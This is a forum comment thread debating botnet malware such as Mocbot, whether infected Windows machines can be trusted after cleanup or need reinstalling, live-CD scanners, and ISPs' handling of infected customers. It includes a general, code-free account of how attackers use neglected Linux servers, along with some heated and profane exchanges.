See, I happen to be the resident security dude at an ISP (half a million customers). Management doesn't care and doesn't understand that this is a problem that needs attention. It's the customer's computer, monitoring traffic costs money, shutting out customers creates service calls (thus costing money), doing what no one else does might drive customers away (costing money), someone needs to install and monitor the system (and that someone will be costing money) and besides, the only damage to the ISP is more traffic and traffic costs next to nothing anyways.

I would be surprised if there were many ISPs thinking differently.

Re:Need to hold users responsible.

[99BottlesOfBeerInMyF]

ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped. Tough love.

And this gets the ISPs more money in what way? Many ISPs can pull up and print out a list of infected hosts by worm and by the amount of traffic they generate. They can automatically integrate this into their notification system and send e-mail to the host's account or shut down access. They don't because then they have to answer the phone calls explaining what is going on and that costs them money. It is easier to throttle that host's traffic and filter out the worm propagation traffic to their core than it is to deal with users' broken Windows installs. If it hits other hosts in the same router group, why should they care?

Reinstalling is not always the answer

[electronerdz]

There is no reason to just reinstall the operating system just because you got a little bit of spyware. Only about 1% of the machines that I have worked on because of spyware have I had to reinstall the operating system. The infection can always be completely gotten rid of. I've only had call backs about spyware that I missed about 3 times. And for all I know, it was because the user went and downloaded something again that put it on there (like Party Poker, etc). And it can all be done with just two a handful of tools (where AdAware is NOT included), and a little bit of creative thinking. For example, recently, I booted a computer into safe mode and used AVG Free to check for viruses. It picked up about 3000 "Trojan.Downloaders." Once it found them, I hit delete for all of them. It took about 30 seconds a file (you do the math). Well, I had two hours before the guy got on a plane. So I exported the list to CSV. Opened it in Excel, deleted all columns except the file names, and put a "del" column to the front. Save, rename to .bat or .cmd, and run. They were deleted in about 20 seconds.

Re:Reinstalling is not always the answer

[Thunderbear]

I congratulate you on your efficiency.

But how can you be _certain_ that you got them all, and that your boss is not still infected?

Re:Reinstalling is not always the answer

[leenks]

How do you know? At any given time virus / spyware checkers only get between 30 and 50 percent of malware that is currently being used, and it takes several months before they eventually get detected. If you can remove stuff that nobody else can detect, you are doing pretty well.

Re:Reinstalling is not always the answer

[httptech]

We're not just talking about spyware here - you feel you've completely cleaned the infection because you no longer notice the intrusive symptoms of popup-ads, slowness, etc. However, how would you know the initial infection hadn't subsequently downloaded a keystroke logger (bought commercially, they can go months without being detected by AV) along with a rootkit to hide it? Rootkit scanners, like AV, are having to play a constant game of keep-up with the commercial malware writers.

If you're a malware expert, yes, you can find and kill all instances of malware on a system without a rebuild. It used to be easier, but the profit motive has really upped the ante for the malware writers, to the point where for 99.999% of the population, a rebuild is in order.

-Joe

Re:Reinstalling is not always the answer

You are a pseudo-geek with a handful of windoze skills who has no idea how much he doesn't know. Congratulations on writing some crappy .bat script, you are officially eligible to work in the tech support department at Best Buy.

Re:Reinstalling is not always the answer

So I exported the list to CSV. Opened it in Excel, deleted all columns except the file names, and put a "del" column to the front. Save, rename to .bat or .cmd, and run.

When the only tool you have is a hammer, every problem looks like a nail. Meanwhile, on a modern OS, a user would just type "virusscan | xargs rm" or "rm `virusscan`"

Re:Reinstalling is not always the answer

[Kjella]

There is no reason to just reinstall the operating system just because you got a little bit of spyware. Only about 1% of the machines that I have worked on because of spyware have I had to reinstall the operating system.

Well, kudos to you but the last two machines I tried that on, it didn't work. Processes were restarting, files were locked, files were copies back when I deleted them, safe mode or not. Perhaps if I had a rescue CD with uncompromised tools on it and could nuke everything from orbit then maybe. I tried that but some of the tools didn't seem to have any easy "run from CD" options. Took what I could find, but it wasn't enough and it invited all its friends back over.

Now I consider myself well experienced with computers, and while I'm sure there's some slashdot geeks who'd run circles around me, most people can't. The kid next door or that IT student down the street won't in general be able to do it. Hell, most shops I know don't want to try, because the failure rate is so high. Plus all the funny bits about users reinstalling the crapware and thinking you're to blame because it returned.

If it'd had been my machine I'd give it a shot, not that it ever has those problems. But it wouldn't take long before I went looking for the install CD...

Re:Reinstalling is not always the answer

> If you can remove stuff that nobody else can detect, you are doing pretty well.

There's no substitute for knowing what's *supposed* to be on a machine. Granted, it's not easy by any means, but I have about a zillion copies of the same image of 'doze at work, and I know pretty well what belongs and what doesn't. So I just fire up a few information gathering tools to find all the things running, find the things that don't belong, trace what they're doing, and wipe them out manually.

Not the easiest thing in the world, by any means, but it gives me a little more confidence than only knowing that $product has just scanned 100% of the c: drive for known threats.

Windows LiveCD

[Coopjust]

The Windows live CD you are thinking about is BartPE, but it's not as easy to use or setup as a Linux LiveCD.

I did set up one myself. It works pretty well once setup.

Re:Windows LiveCD

Actually, I think the one you are thinking of is Ultimate Boot CD for Windows http://www.ubcd4win.com/ which is a very functional live cd. Also has numerous other tools that make cleaning an infected system, creating admin accounts, and other cool maintenance a breeze.

Re:Windows LiveCD

[poolmeister]

UBCD for Windows is just a collection of Barts PE plugins to help you build your own Windows Live CD from Barts PE and your Windows disk, even then it's only really a maintenance CD, you wouldn't want to use it as a Live boot OS, I've tried it on many PCs in the past and I've never been able to get networking going once.
Windows is inherantly a bad choice for a live boot OS because of the messy issue of having as many 3rd party drivers as possible loaded into the image.

Linux distros are now miles ahead of Windows when it comes to hardware detection on first boot.

Re:Windows LiveCD

[Yyrkoon420]

Miles ahead if you're lazy perhaps, there another tool seemingly lost on you 'slipstreaming'. You can manually slipstream, or use third party GUI tools. I think we all can agree Windows is NOT like Linux in many respects, one is that you actually have to pay for someone elses hard work, two while windows may make update availible via the internet, you cannot download a freshly made ISO (atleast not without a high level MSDN subscription you cant). Anyhow, the only other option for this case, is slipstreaming, and if you think about it, its easier on bandwidth, and less time consuming than downloading an entire ISO from whatever distro you preffer. Yes, we also know that Linux has live updates as well . . . Now, why live CD if not for maintenance ? Atleast in this situation thats the whole idea, removal of malicious software. You need something to mount a drive, in a way, that makes removing malware easier. Personally, I'd never use a Linux LIVE CD to 'fix' anything on a windows system, but I actually know about, and know how to use the tools availible for said operating system. Would you use a 'LIVE' windows CD to remove rootkits from Linux ? Somehow I dont think so.

Re:Windows LiveCD

[ozmanjusri]

Windows is NOT like Linux in many respects, one is that you actually have to pay over and over and over again for someone elses hard work

Fixed that for you.

Re:Windows LiveCD

[Yyrkoon420]

Its obvious that you need to read your own quote.

Re:Windows LiveCD

[poolmeister]

@Yyrkoon

Calm down & pay attention before you fly off the handle with mis-read assumptions, where we talking about 'fixing' anything with Live boot OSs?.
We were talking in the context of using a Live disk as a non volatile operating system, not for fixing a hosed installed OS.

Then you dribble on about...

"Now, why live CD if not for maintenance ?"

err... did I say this?


"Personally, I'd never use a Linux LIVE CD to 'fix' anything on a windows system,"

Then you don't know what you're doing, or maybe you just prefer to spend hours setting up a CD that enables you to click a button to receive a problem report from an unguaranteed 3rd party program... STFU.


"Miles ahead if you're lazy perhaps, there another tool seemingly lost on you 'slipstreaming'."

You seemed to miss the bit about BartsPE didn't you, which still (in my opinion) doesn't make Windows any more successfull as a Live boot OS, all very well if you're going to use it on one or two PC's but not practicle otherwise, I'm not saying it's impossible, note I said NOT PRACTICLE, write that down if you like.

Re:Windows LiveCD

[zacronos]

Now, why live CD if not for maintenance ? Atleast in this situation thats the whole idea, removal of malicious software.

I think you missed the point -- I believe the idea of using a live CD was brought up as a suggestion for how you always run your system, not for how you perform maintenance on your system. Why, you ask? Because if the OS is on a CD in a non-writing CD-ROM drive, the OS can't be infected by malware, or at least only until the next time you reboot. In other words, the idea is that this sort of "maintenance" (removing malware) isn't really necessary if you are always running from a live CD, because you just need to reboot.

Now, with that said, I'm sure it's still possible to infect your system by writing to your networked files; maybe it wouldn't give root access automatically on reboot, but every time you execute a certain file. Unless you don't do any software developing, script writing, etc, or roll your CD on a very regular basis, then you'll still have executable files on a writable mount. I know that restriction makes intalling rootkits much harder, but I wouldn't want to claim it is impossible.

Re:Windows LiveCD

[ericlondaits]

I think you missed the point -- I believe the idea of using a live CD was brought up as a suggestion for how you always run your system, not for how you perform maintenance on your system. Why, you ask? Because if the OS is on a CD in a non-writing CD-ROM drive, the OS can't be infected by malware, or at least only until the next time you reboot.

A system partition mounted as ro should be a pretty solid alternative to this approach, I guess. You can keep the image in a CD and just write over it if a hacker finds a way to bypass it (which shouldn't be easier than bypassing the OS in the CD).

Re:Windows LiveCD

[Yyrkoon420]

Sorry guy, topic is 'spying on botNETs.

Re:Windows LiveCD

[Yyrkoon420]

Well, I think you and that other guy missed MY point. This article discussion topic, is_about maleware / viruses. BartPE is a PoS. ERD 200x IS basicly a live CD, but will only run for 24 hours at a time before shutting down, you also *gasp* have to pay for it . . . Now back to what I was talking about, you were saying that Windows loads tons of un needed drivers, well thats why I said slipstreaming, you do know what slipstreaming _is_ dont you ? You can remove / add any amount of drivers you like, turn on / off services, and basicly adjust any aspect of a Windows XP setup disk, but, this doesnt make a live CD. Now if you two were talking about running live CDs as an alternative to running an OS from HDD, then it would be nice if you two stayed on topic, and made these things clear.

Server counterpart to this

[Alex+Belits]

How a server got compromised, and ran a Paypal scam site for two days, more technical explanation of what happened, and how to (and how not to) make Yahoo block the accounts involved. Of course, the idea that compromised machine can in any way be trusted, sounds like one of the stupidest things ever thought up by a human.

Re:Server counterpart to this

[makomk]

I always wondered why Windows machines were more often chosen as targets than Linux ones, and now it's obvious - the script kiddies doing the hacking can't cope with all the little variations between distros...

Need to hold ISP's responsible

[RKBA]

"ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped."

In my experience, the cable installers are clueless. When I switched from DSL to Cable, the cable installers (two of them, one was a trainee) hooked up their cable to my router/hardware firewall and everything was fine. Then the senior guy asked if he could hook up their cable box directly to my computer to show the trainee how they normally do things. After booting into a spare version of the OS that I only use for maintenance (which is on a different partition than my regular OS), I let him hook his cable directly up to my computer, bypassing my router. Within about 20 seconds my antivirus program detected and reported a virus attack, although I forget the exact details because it was several years ago.

The point is that the cable installers connect their cable up to new subscribers computers without even checking their virus protection, and the naive users computers are probably infected before the installers drive away. The ISP would be far better off supplying hardware router/firewalls to their customers gratis because of the reduced traffic load from zombie computers.

Re:Need to hold ISP's responsible

[Grand+Facade]

Initiate a support call to your ISP and the first thing they tell you to do is to remove your firewall/router in order to trouble shoot your connection......

Bastards

Re:Need to hold ISP's responsible

[CronoCloud]

the ISP would be far better off supplying hardware router/firewalls to their customers gratis because of the reduced traffic load from zombie computers.

The local cable ISP used to say home networks were unsupported and would ask you to remove the router if you had troubles. They also charged $5 per additional computer (or other device)attached to the connection (for the IP address)

Now they have networking information on their website and include routers as part of connection packages.

Re:Need to hold ISP's responsible

[acaspis]

Bad idea. If you hold ISPs responsible, they will have no choice but to interfere with what you do with your computer. They won't let you connect to the net unless you are running Windows build #XXXX with firewall Y and antivirus Z. This can easily be done with Trusted Computing and Trusted Network Connect.

Both of these technologies are great for corporate networks, but I hope you can see where this leads if they become mandatory on your personal machine.

AC

Re:Need to hold ISP's responsible

[not_hylas(+)]

O-M-G, I see smart people.

We do need to hold ISPs responsible to police their own neighborhoods (fat chance really).
For you that say this will infringe on your privacy ... check your TOS, your DSL/cable contracts are written by people that make mazes seem straightforward.

Brave New World
Corporations, ISPs, Spammers, Crackers - think: circlejerk
No ones gonna do nothing about anything and they'll inforce it too.
ref: scewed-blued-tattooed, NO CARRIER joke

http://www.macrovision.com/

http://www.softsummit.com/index.shtml

Old examples (where do you think you stand now?)

http://www.dslreports.com/forum/remark,2122413~roo t=comcast~mode=flat

http://arstechnica.com/news.ars/post/20030922-2852 .html

http://wiki.phoenixlabs.org/wiki/Type's_of_Infring ement_Letters

I hope I'm wrong, this internet thingy could be really cool if we could just find a really good "front door" of sorts and quit chaining down ALL THE FURNITURE, Something we could run *anything* - completely unpatched behind, tele-commute with bunnie slippers on - like God intended.
That freedom alone would contribute to ending dependence on oil.

Incidentally, by reading this you're agreeing to:

just kidding.

"it's only after you've lost everything that you are free to do anything"
Fight Club

Trusted Computing.... and Windows

[Lord+Prox]

Just a thought... With Windows security being what it is, how long will it be before a malware author or spamhouse coder get their stuff installed as trusted code. Then things really will be hard to remove.

Second thought. This could be a good thing. After a while of malware being "trusted" will people and companies abandon the TCP program? I am not a big fan of the TCP concept and this outcome could be the answer to getting rid of it. Or not.

Re:Trusted Computing.... and Windows

[Short+Circuit]

It'll likely remain in systems, just rarely used or updated. Like floppy drives, serial ports parallel ports, the AT keyboard architecture (of which PS/2 keyboards are essentially a clone), and CGA and EGA video modes.

To cut costs, it'll get integrated into the northbridge/southbridge pair of chips. The x86 system is (in)famous for its support and occasional dependancy on legacy systems. Did you know that you can still run MS DOS on most modern computers?

Re:Trusted Computing.... and Windows

Ninja please, TC/Palladium could bend Joe User over and fuck him in the ass every time he sat down to use the computer and he'd still grit his teeth and take it like a champ. Working the front lines of tech support has taught me that the average user is stupid. Far more stupid than anyone on Slashdot can imagine. Windows is all they'll ever know because they are incapable of understanding anything even slightly different, and if Windows comes bundled with all manner of DRM and TC technologies that make the user's life a living hell, they'll take it and they'll tell their friends how great it is. This might change in 20-30 years as more people grow up with computers and understand them more (and fear them less) but for the immediate future we're stuck swallowing shit because Joe User likes the taste.

Re:Trusted Computing.... and Windows

[real_b0fh]

nobody forces you to use windows and 'swallow shit' like you say, dude.

there are plenty alternatives out there.

For the record...

[httptech]

It not like I'm the only one who ever figured out how to spy on botnet control channels. This has been going on for years. Some researchers only spy on the botnet to find out what the botnet is being used for. Some even take it upon themselves to try and "clean" the infected systems of the bots (Mocbot has a "remove" command, by the way, but you have to have the correct user@host mask). Botherders sometimes even spy on each others channels, to try and take control of less-protected botnets from other botherders.

-Joe

Too easy...

[MoogMan]

My house was robbed once... even with fully locked doors, up to date alarm company subscription, and a dog.

You probably had Windows...

Re:Too easy...

[suffe]

100% of houses being robbed has windows. Coincidence? I think not!

Re:Too easy...

[99BottlesOfBeerInMyF]

You probably had Windows...

Funny thing, I bought this house in a nice area, but a short walk from a high crime area. It was built in the 50's out of concrete block (two blocks thick on the ground floor). All the windows on the ground floor were glass block and could not be opened. The upstairs was the real living area with lots of windows, but a full story (slightly higher than a normal house) up in the air. It had a back deck on the second story, with no stairs going down and with the deck overhanging the supports a good three feet or more (making climbing it really hard). It also has a monitored security system (I've since updated). I haven't had a break in yet. :) It is the OpenBSD of houses.

Why do you rob banks?

[twitter]

... because that's where the money is.

You write about root kits and declare:

Just by the virtue of the large number of x86 Linux servers exposed to the Intarweb, there must be thousands of systems just waiting to be rooted. Fortunately for "us", there are millions of exposed Windows client PCs running as Adminstator, begging to be owned.

As if the only difference was numbers. The other difference, or so claim the FUDsters, is that "Linux is for servers." You know, like banks and businesses that handle real money. Given the profile and importance of those targets, you would think they would be hit all the time and that we would hear about it as we hear of IIS exploits. For some reason we don't hear anything, despite the very open nature of the people running the software. It would seem that there's more at work than numbers here.

On the desktop there's another crucial difference, the ease of recovery. In the Windoze world, you pull out your ancient "original" CD and put the same broken crap right back on your machine. It wipes out all your documents and setting so you suffer a loss for no gain. Then you are rooted again in about 12 minutes after hooking up to a network. In the free world, you do a net install and get the latest and greatest of everything, without losing anything at all. A few extra steps can make sure the root kit is not in your home directory. The easiest is to chmod file in your home directory to no execute. In the very worst case you can chmod and then tar up the documents you worry about and start fresh with your settings, like in the windoze world but much easier.

Re:Why do you rob banks?

[Nutria]

Just by the virtue of the large number of x86 Linux servers exposed ... there must be thousands of systems

As if the only difference was numbers. The other difference, or so claim the FUDsters, is that "Linux is for servers." You know, like banks and businesses that handle real money. Given the profile and importance of those targets, you would think they would be hit all the time and that we would hear about it as we hear of IIS exploits. For some reason we don't hear anything, despite the very open nature of the people running the software. It would seem that there's more at work than numbers here.

Re-read my post, and then think.

Some Linux servers will be vulnerable. Even if only 0.1% of Linux systems are vulnerable thru SysAdmin neglect or unfixed bugs, if there are 10^6 systems there will be 1000 vulberable systems.

(I say servers because Linux desktops tend not to expose services to the Internet.)

Re:Why do you rob banks?

[twitter]

An oversized rat tells me to think, and offers an lesson in proportions and exponents:

Re-read my post, and then think. Some Linux servers will be vulnerable. Even if only 0.1% of Linux systems are vulnerable thru SysAdmin neglect or unfixed bugs, if there are 10^6 systems there will be 1000 vulberable systems.

So what? You want to replace that with systems that are ALL vulnerable to multiple attacks regardless of the competence of the administrator? Help me out Nutria, what are you trying to tell me? I don't see anything worth pondering above.

Re:Why do you rob banks?

What do you think the C&C machines are running?

Linux servers, especially colocated ones, tend to have a much higher uptime; in addition, the ircds and other servers they run tend to run best (or only) on Linux. A Linux shell box is a lot more useful to a blackhat than a Windows drone. This makes them individually more attractive targets.

Imagine you're a blackhat. So what you're after, for a C&C server, is someone else's poorly-maintained Linux box; the one that the admin thinks is impenetrable, because it runs Linux, and so hasn't updated it or even looked at it in ages. It's going to have a high uptime, because it almost never reboots because the guy never installs a new kernel on it. You can probably spy out the uptime quietly in advance via the usual trickery, because some admin thought Linux boxes don't need firewalls. And you're most likely going to get in through a PHP hole (application or language, it doesn't matter when the language and common software is that poorly designed) or if it's really out of date an Apache or MySQL hole - because it's probably a almost-never-used webserver.

And then you're going to install a rootkit - think l10n, only more so (there are actually some seriously hardcore Linux rootkits that blow pretty much all of the public rootkits for Windows out of the water when it comes to stealth; and this is why) - and then you're going to patch it, so no-one else roots your new 0wned C&C box, because nothing sucks more than some other blackhat stealing your botnet.

Next thing you know, bam, the thing's running a modified hybrid-ircd or something, and is one of the magic servers you encoded in your trojan to which the Windows drones are connecting back, or one of the webservers they are getting the spam proxy or spyware installer from; and thus you, the blackhat, earning nice fat sums of cash on the back of one or two Linux servers and a few hundred or thousand random Windows machines.

So, don't discount the threat. All operating systems need patching and good security practice to run safely.

And 0.1% seems like a low estimate; remember Linux distributions, especially server-oriented ones, tend not to have an automatic update feature (with good reason, to a point), so they do require manual intervention to patch. With appropriate care and feeding they are of course not just fine, but can be really quite secure; but neglected, it's a whole different story. Think closer to 2-3% as being a potential problem, and almost 5% in some (LAMP) brackets.

Re:Why do you rob banks?

[Nutria]

So what? You want to replace that with systems that are ALL vulnerable to multiple attacks regardless of the competence of the administrator?

What gives you that idea?

Because I recognize that Linux distros are not perfect, not all SysAdmins are up to snuff, and not all security bugs in all *ix apps have been discovered and patched, you think I am a Windows fanboi?

Re:Why do you rob banks?

[Nutria]

someone else's poorly-maintained Linux box; the one that the admin thinks is impenetrable, because it runs Linux, and so hasn't updated it or even looked at it in ages.

Sacrilege! Sacrilege, you Windows fanboi!!!! How dare you criticize the Holy Penguin!!!!!!!!!!

Re:Why do you rob banks?

[WilliamSChips]

What do you think the C&C machines are running?

I dunno, maybe Command and Conquer? Dumbass...

Re:Why do you rob banks?

[99BottlesOfBeerInMyF]

What do you think the C&C machines are running?

This is a good point and a lot of the IRC channels are running on rooted Linux boxes. What I find interesting is how the botherder community knowledge limits what they do. Linux desktops are not protected only by the fact that they are rare, but also by the fact that a lot of these people have no idea what they are doing beyond the tried and true tools. The community has the knowledge to root Linux servers and Windows servers, but aside from that they rely heavily upon metasploit type tools and existing code. If either platform undergoes a security transformation, expect the other to be the exclusive control channel for a while.

Re:Why do you rob banks?

[twitter]

I'll take that as a "no" response. You obviously think that free software is a superior alternative. Thanks!

Re:Why do you rob banks?

[dougmc]

the ircds and other servers they run tend to run best (or only) on Linux

It's been a while (around ten years?), but back when I ran a few (legitimate) IRC servers, I found that in general ircd on FreeBSD worked much better on the same hardware than Linux did, being able to handle roughly twice as many users and crashing (sometimes the entire box) far less often while doing so. ircd is pretty hard on your networking stack when you have hundreds (back then -- now servers do thousands) of simultaneous users. To be fair, Linux's networking code has certainly improved greatly since then, so maybe the difference is much smaller now.

Of course, there's probably 10x as many Linux servers out there as FreeBSD servers, and really, your arguments wouldnt' be any less spot-on if you replaced Linux with just `*nix' (except that it wouldn't surprise me if many of the new ircds only worked under Linux as you suggested -- portability isn't nearly as important to many as it used to be), so it's not really a big deal.

Re:Why do you rob banks?

What a stupid, worthless fucktard.

However, sad but true...

[Jugalator]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system

However, even that might not help if the OS in question is Windows XP and not integrated with SP2 on the same CD, and you don't know what you're doing. (like disconnecting the network until you've installed SP2 that you of course had lying on another disc so you don't need to go online for it)

Pretty annoying what a highly flawed and widely spread OS can do.

the already do that.

[twitter]

Congratulations, you noticed the reason that studies show Windows has a 12 minute half life on any network.

The ISP would be far better off supplying hardware router/firewalls to their customers gratis because of the reduced traffic load from zombie computers.

The cable modem already does that but it does not work. They block outbound ports and limit the upload speed. You can't block the inbound ports because you would block services users would actually notice. Even if you could lock up everything and only use one port for inbound and one port for outbound, the root would come through your browser or email. The bottom line is the computer on the other end has Windoze and Windoze has problems you can't fix with a router or an anti virus program. Without Windoze, you would not need any of the above, performance limiting crap.

Link to the original paper

[Loualbano2]

More technical version:

http://www.lurhq.com/mocbot-spam.html

There are more interesting papers on lurhq's site:

http://www.lurhq.com/research_threat.html

-ft

My ISP does this.

[PotatoHead]

I've one XP home box running.

(We play online poker ok?)

It got infected with this crap and started spewing spam. Primary cause of this is kid browsing BTW. They are the most likely to click on the baddies. Put 'yer kids on Linux or a Mac and lots of this just goes away.

Within a few hours I got a call on my cell. Asked me what I wanted to do. I said pull the plug if the box is still spewing in a few hours. (That was time enough for me to get home and deal.) I arrived home, pulled the plug on the offending box, started archiving data in preparation for a re-image. Shot off a quick e-mail asking them to check for baddies on their end just to be sure. All done, next.

This is exactly why the ISP consolidation is just horrible. Had we continued to have a high percentage of live and local ISP's, people would have someone they could trust to let them know things are not as they seem.

I know my ISP sysadmins by name. Most people should. I don't talk with them much, but when I need to, it's always worthwhile. Nice folks --we need more of them.

BTW: Joey http://www.spiretech.com/ If you are in PDX, give them a call.

Re:My ISP does this.

[despisethesun]

It got infected with this crap and started spewing spam. Primary cause of this is kid browsing BTW. They are the most likely to click on the baddies. Put 'yer kids on Linux or a Mac and lots of this just goes away.

You must not deal with a lot of "normal" computer users. Believe me, the average user is at least as bad as any child you've left on one of your computers. Left to their own devices (ie without an IT department to baby them) these people will wreak all manner of havoc. But who am I to complain? Stupid users are keeping me employed.

Re:My ISP does this.

(We play online poker ok?)

No. Not ok. Online poker sites pay for a huge amount of spam, especially stuff like forum comment spam and domain squatting. That's like saying "We send free iPods to the widows of Nigerian princes, then refinance our mortgage and buy knockoff rolex watches and cheap v.1.4.g.R.a with the profits, ok?"

ISP should warn

[zymano]

There should also be mandatory rule about not using Windows xp without firewall and virus protection. It's a useless operating system.

A change is coming and the Vista is beautiful !

How much do you know about Windows Vista and how it changes this?

I say we nuke the server from orbit

[gijoel]

It's the only way to be sure that it's free of malware.

correction

[thinsoldier]

CORRECTION:
The only way to be [completely] sure the system (Windows) is malware-free is to completely wipe the hard drive and reinstall (Windows)the operating system.'"

get it right.

You have to wonder

[gx5000]

You have to wonder..I mean, of course it's a disaster out there, we're not setting up newbies with enough education or software. I setup my users with XPSP2, Norton, Pest Patrol, Spybot, Norton ghost or Acronis and a router and a promise to "try" and stay away from googling porn. Out of ninety regulars on my phone, only three of them need re-image instruction once in a while. Malware ? what malware ?

Re:You have to wonder

Maybe there is no infections detected because after the many layers of security band-aids installed like Norton, Pest patrol, .. etc, the remaining 10% cpu resource left over is not enough to get on the Internet?

Re:You have to wonder

[gx5000]

LOL, huh, ok....lol The point is, was, That all these resources don't take up that much (RE:Norton is Corporate, not the retail crap) And Once the First OS setup is complete they have an Image to fall back on if they suspect they are compromised. As long as you setup their pst file and their "My Documents" to point to another drive, they lose nada when they re-image and then they're Clean. I don't know many techs that setup up their users like that to the point that they only call me up to thank me and ask functionality questions, other than buy me beer ;-)

BartPE?

[ecalkin]

I realized that BartPE could be a handy tool for cleaning up stuff. if nothing from the hard drive is in memory when bart is running, it can't stop tools running under bart from cleaning the crud out.

    I also realized that with the many plug-ins that bart has, you could make a fairly usable static system with it. it gets infected? reboot. it gets questionable? reboot.

e

Then beg for another activation

[HangingChad]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

The only way to be sure on a WINDOWS system is to reinstall the operating system, something that Windows users just seem to accept. Then you have to beg MSFT to reactivate your operating system. If you reinstall routinely, some day they'll start acting like you're expected to pay for it...again.

I have one token XP Pro box on my network but don't routinely use it to surf the internet (except when it's rendering video). Email, most of my online work...all Linux. Windows is a fine operating system, just don't connect it to the internet.

Re:Then beg for another activation

[Joe+U]

The only way to be sure on a WINDOWS system is to reinstall the operating system, something that Windows users just seem to accept.

Actually, there are two methods available, one is to reinstall, which takes a few hours. The other is to clean the system and do a comparison from the original media/sources, which would take longer, so it's easier to reinstall. Either way, these are ONLY METHODS FOR ANY OS that guarantee you are not infected.

Then you have to beg MSFT to reactivate your operating system. If you reinstall routinely, some day they'll start acting like you're expected to pay for it...again

Yeah, you keep ranting and raving on about that. It's a load of crap and not true at all, but don't worry, it sounds good. Eventually, if you yell loud enough and jump up and down while waving your hands, people might listen or even take you seriously.

Granted, you'll be acting like a spoiled brat, but hey, it works for politicians.

Re:Then beg for another activation

So if your Linux/OS X/whatever OS happens to get infected with malware (or R00t3d), there is some magical way to determine if you've removed it all? Why don't you enlighten us? I don't care what OS you run, if you get hacked the only way to be 100% sure you've removed any malware is to reinstall the OS.

I've been using Windows for years now and have yet to get an infection of any sort (viruses or spyware).

Re:Then beg for another activation

[Nicolas+MONNET]

Boot from a CD, chkrootkit, check RPM MD5s ... it might not be 100% reliable but it's damn close, and it takes 10min. I'd like to know how you do this under Windows. Oh, that's right, you don't.

Sometimes even a reinstall won't help

> The only way to be [completely] sure the system is
> malware-free is to completely wipe the hard drive
> and reinstall the operating system.'"

I am not sure of this. What about those hardware devices where one can upgrade the firmware without setting a jumper? In other words, everything happens in software. What if, say, a malware replaces the BIOS on one such device? Then even an OS reinstall won't help. You are owned on a lower level than the OS. AFAIR, some modems were suspectible for this.

Vilmos

Re:Sometimes even a reinstall won't help

[Datamonstar]

They are in the wild. Rare, I'm sure, but I have seen them. If it's not checksummed to a fairly decent degree you can believe a hardware device is able to be subverted at the hardware level if physical switches are not used to prevent an overwrite. In my opinion, EVERY hardware device with a flashable firmware chip on it should include physical security for this reason.

Moo

[Chacham]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

Or MD5 everything.

Re:Moo

SHA if you wish to be cryptographically secure

Live CD Virus Scanner

[Nom+du+Keyboard]

What users need, and I'm continually surprised that it isn't here already, is a Live CD Virus scanner. Download the ISO, burn the CD, boot it on suspect machines, and let it do the job of reading your system disc as a simple data disc. The idea that a program running on an infected system can spot and remove the infection seems questionable at best.

Re:Live CD Virus Scanner

[modulo]

Here you go http://www.bitdefender.com/bd/site/presscenter.php ?menu_id=25&n_id=84/ I've used an earlier incarnation, works well.

Re:Live CD Virus Scanner

[Nom+du+Keyboard]

Here you go http://www.bitdefender.com/bd/site/presscenter.php ?menu_id=25&n_id=84/ I've used an earlier incarnation, works well.

Went to the site, but I don't immediately see how this will scan Windows system from a Live CD that should be able to spot and remove rootkits that would evade detection when running under the operating system itself. They look more like they're into Linux solutions.

Re:Live CD Virus Scanner

[modulo]

LinuxDefender runs Linux off of the CD, but uses Captive NTFS to mount the NTFS partitions on your hard drive and scan them.
(You'll need an XP license to be able to use XP SP1 to extract the NTFS drivers--if you use FAT32 that won't be an issue.)

I notice they pulled the download but it's still available from the mirror at http://ftp.iasi.roedu.net/mirrors/ftp.bitdefender. com/pub/Live/, see
http://buy.bitdefender.com/bd/site/mirrors.php/.

reinstall troubles...

[Tom]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'

Yes, and your average user will quickly encounter another funny problem: He has a good chance to be infected again before the download of SP2 and/or other security updates he needs to not be re-infected, is finished...

No, no, no...

[adamofgreyskull]

He has it wrong, you have to take off and nuke the entire site from orbit. It's the only way to be sure.

blah blah

"He can put whatever he wants on your machine, and there's no way to be 100 percent sure that the machine is clean."
- right so one cannot perform a man-in-the-middle"
"attack", to see what traffic is going into / out
a suspect machine.

"The lesson here is once you get infected, you are completely under the control of the botmaster."
-a trojan/bot whatever has the same user right as the person executing it.

the real threat of any trojan/virus/bot is bad code in the host OS, allowing for
buffer overflows, underruns etc. that's all. looking forward to buffer overflow
protection in the hardware / CPU

just wondering how long it is going to take for the win95 mentality about
file permissions / access right to go extinct. truely amazing that a computer
can not just make you smarter but also dumber ...

FUD

Re:Windows Live CD?

[protobion]

Did you know about this ?

Window Live CD

what is new

So once a machine is infected the trojan can and does install anything it wants? and someone can spy on a botnet - what is new?

Go to the D.M.C.A

Of course, since he effectively broke a digital access control (reverse-engineering "trivial" encryption) and then ran the program in ways that the author did not explicitly permit (in a sandnet) then he's a criminal as bad as DMCA Jon.
AC

It's a circular zen thing....

[Joce640k]

If you really think reinstalling is the answer then reinstalling is *not* the answer - you're so clueless that you'll be reinfected within a week.

There's very few Windows machines which can't be fixed if all they have is a malware infection. All it normally takes is a reboot in safe mode, run an antivirus and a malware scan, then look in "...Whatever\Current_Version\Microsoft\Windows\Run " and google the names of all the .exe files in there.

Next, uninstall anything made by Symantec from the machine. It's all useless, every single byte of it. There's not a virus on the planet which doesn't know how to disable Norton Internet Security.

While you're at it, you can delete all the, um, "legitimate" stuff you find in the Registry's "Run" key. Most of it isn't needed and your machine will boot a lot faster without all those dumb printer driver accessories, Apple Quicktime crap, etc.

Sure, it's theoretically possible that this could fail, but in practice it doesn't. Virus writers don't need to do anything more than this infect a Windows machine so they don't bother.

Re:It's a circular zen thing....

[electronerdz]

Thank you! Malware is not impossible to get rid of. You just need to know where it hides. And just because you have to reboot a couple of times, doesn't mean the method is failing. And I completely agree on Symantec. It gives a significant speed boost. The reason most "shops" have a problem with removing it correctly is because they don't know what they are doing, like the Geek Squad or whatever it is at Best Buy. And reinstalling is not any quicker when you take backup and restore into the time, which a responsible tech should do.

Re:It's a circular zen thing....

[TheRaven64]

Once a machine is compromised, you have no way of knowing how compromised it is. A piece of malware can patch the filesystem driver to hide itself, it can patch the process table so that nothing lists it as running. See the Sony rootkit for more information.

